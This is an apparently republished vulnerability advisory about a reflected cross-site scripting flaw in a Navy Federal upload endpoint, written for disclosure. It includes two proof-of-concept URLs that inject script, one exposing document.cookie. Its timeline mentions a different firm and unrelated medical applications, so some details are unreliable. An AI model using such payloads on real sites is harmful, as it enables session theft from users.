The Navy Federal site at navyfederal.org suffered from a cross site scripting vulnerability.
9139d239aff0e11b1a88e1a4303fccf0bce34f1d49073a50d2a694b0640107e6Vendor
-------------------------------------------------
Navy Federal - (https://www.navyfederal.org/
Product
-------------------------------------------------
Front pubic facing application
Credit
-------------------------------------------------
Arthrocyber
http://arthrocyber.com/research/#finding_7
David Reyes
Vulnerability Summary
-------------------------------------------------
The endpoint sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain did not sanitize HTML characters. It was possible to pass HTML code which triggered an XSS.
Technical Details
-------------------------------------------------
The parameter "type" failed to properly sanitize HTML characters resulting in reflective XSS.
https://sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain?OpenForm&Seq=1&Type=%22%3E%3Cscript%3Ealert(%225-2-17--Reflective-Arthrocyber-XSS%22)%3C/script%3E
https://sdu.navyfederal.org/__85258014004953a3.nsf/secureUploadMain?OpenForm&Seq=1&Type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eß
Solution
-------------------------------------------------
Reference OWASP top 10.
https://owasp.org/www-community/attacks/xss/
Timeline
-------------------------------------------------
07 May 2019 - Adaptive Security Consulting discovered a series of vulnerabilities in medical records management and
search applications being considered by our client
September 2020 - Endpoint no longer appears to be vulnerable to XSS.
Juan Avila
Arthrocyber, LLC
Cell (682)238-7188
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed